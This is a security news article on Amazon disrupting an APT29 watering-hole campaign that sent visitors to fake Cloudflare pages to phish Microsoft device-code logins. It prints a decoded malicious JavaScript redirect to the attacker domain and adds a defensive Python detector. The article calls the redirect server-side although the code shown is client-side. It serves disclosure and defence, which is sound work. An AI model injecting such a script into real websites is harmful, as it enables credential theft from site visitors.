Amazon Dismantles Russian APT 29 Infrastructure Used to Attack Users

Amazon’s threat intelligence team uncovered a sophisticated watering hole campaign in late August 2025, orchestrated by APT29, also known as Midnight Blizzard, a Russian Foreign Intelligence Service–linked actor.

The operation relied on the compromise of legitimate websites to redirect unsuspecting visitors to malicious infrastructure.

Once redirected, users encountered counterfeit Cloudflare verification pages designed to harvest credentials and trick victims into authorizing attacker-controlled devices through Microsoft’s device code authentication flow.

The campaign’s breadth was striking: approximately 10 percent of site visitors were siphoned off to actor-controlled domains such as findcloudflare[.]com and cloudflare.redirectpartners[.]com.

These domains mimicked official security checks so convincingly that many users failed to detect the ruse.

Image of compromised page, with domain name removed (Source – Amazon)

Amazon analysts noted that this approach marked a significant evolution in APT29’s tradecraft. Instead of relying solely on phishing emails or targeted spear-phishing, the group employed opportunistic injection of obfuscated JavaScript into compromised sites.

This tactic broadened their potential victim pool by embedding malicious redirects directly into popular web pages.

Visitors were often unaware they were being rerouted until prompted to enter device codes or approve new device authorizations—actions that granted the threat actor persistent access.

The impact of this campaign extended beyond mere credential theft. By integrating with Microsoft’s device code authentication, APT29 could persist within corporate environments, leveraging authorized sessions to move laterally and gather intelligence.

Although no AWS systems were compromised, the incident underscored the persistent threat posed by state-sponsored actors adapting their methods to evade traditional defenses.

Amazon worked rapidly with Cloudflare, Microsoft, and other providers to dismantle the malicious domains and isolate compromised EC2 instances, illustrating the power of coordinated industry response.

Technical Overview of Obfuscated JavaScript

A closer look at the injected script reveals several advanced evasion techniques. The JavaScript payload was base64-encoded to mask its true purpose, and randomization logic redirected only a subset of visitors, reducing the likelihood of detection.

Once decoded, the snippet performed a server-side redirect to the fraudulent authentication page while setting cookies to prevent repeated redirects of the same user. A simplified version of the decoded code appears below:

(function(){
    // Per-visitor marker so the same browser is only redirected once
    var uid = Math.random().toString(36).substring(2);
    // Redirect only visitors without the marker cookie, and only about 10% of them
    if (!document.cookie.includes('redir=') && Math.random() < 0.1) {
        document.cookie = 'redir=' + uid + ';path=/';
        window.location.replace('https://findcloudflare.com/device/code?auth=' + uid);
    }
})();

This snippet exemplifies APT29’s shift from client-side to server-side redirects when previous infrastructure was disrupted.
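The traits the article describes (a base64-wrapped script, a probabilistic redirect, a marker cookie, a brand lookalike host) can be checked for when auditing a site's pages. The following is an added example written for this article, not Amazon's or Cyber Security News's code; the HTML is constructed, the trusted-host list is an assumption, and the hostname is the one the article reports.

```python
import base64
import re
from typing import Dict, Iterable, List

# Constructed sample: a legitimate-looking page whose footer carries an injected,
# base64-wrapped script of the kind described in the article.
INJECTED_JS = (
    "(function(){var uid=Math.random().toString(36).substring(2);"
    "if(!document.cookie.includes('redir=')&&Math.random()<0.1){"
    "document.cookie='redir='+uid+';path=/';"
    "window.location.replace('https://findcloudflare.com/device/code?auth='+uid);}})();"
)
SAMPLE_HTML = (
    "<html><body><h1>Welcome</h1>"
    "<script>eval(atob('%s'));</script></body></html>"
    % base64.b64encode(INJECTED_JS.encode()).decode()
)

SCRIPT_RE = re.compile(r"<script[^>]*>(.*?)</script>", re.S | re.I)
B64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")        # long base64-looking runs
REDIRECT_RE = re.compile(r"location\.(replace|assign|href)")
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)

def decode_b64_blobs(script: str) -> List[str]:
    """Return every long base64 run in a script that decodes to valid UTF-8 text."""
    decoded = []
    for m in B64_RE.finditer(script):
        try:
            decoded.append(base64.b64decode(m.group(0), validate=True).decode("utf-8"))
        except (ValueError, UnicodeDecodeError):
            continue  # hashes or other opaque strings are skipped, not flagged
    return decoded

def find_suspicious_redirects(html: str, trusted_hosts: Iterable[str]) -> List[Dict]:
    """Flag scripts (raw or base64-decoded) that redirect to untrusted hosts."""
    trusted = {h.lower() for h in trusted_hosts}
    findings = []
    for script in SCRIPT_RE.findall(html):
        for layer in [script] + decode_b64_blobs(script):
            if not REDIRECT_RE.search(layer):
                continue
            for host in URL_RE.findall(layer):
                host = host.lower()
                if host in trusted:
                    continue
                findings.append({
                    "host": host,
                    "encoded": layer is not script,          # hidden behind base64
                    "sampled": "Math.random()" in layer,     # only a subset redirected
                    "sets_cookie": "document.cookie" in layer,  # one-shot marker
                    "brand_lookalike": "cloudflare" in host, # mimics a security check
                })
    return findings
```

Run it over a site's crawled pages with the site's own hosts as the trusted set; a hit with all four traits true is a strong match for the pattern the article describes.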

By rapidly migrating to new domains and refining their code, the group sustained their campaign despite ongoing takedowns.

Amazon’s successful disruption of this infrastructure highlights the necessity for continuous monitoring of web-based threats and collaboration across the security community.

The post Amazon Dismantles Russian APT 29 Infrastructure Used to Attack Users appeared first on Cyber Security News.

About Cybernoz

Security researcher and threat analyst with expertise in malware analysis and incident response.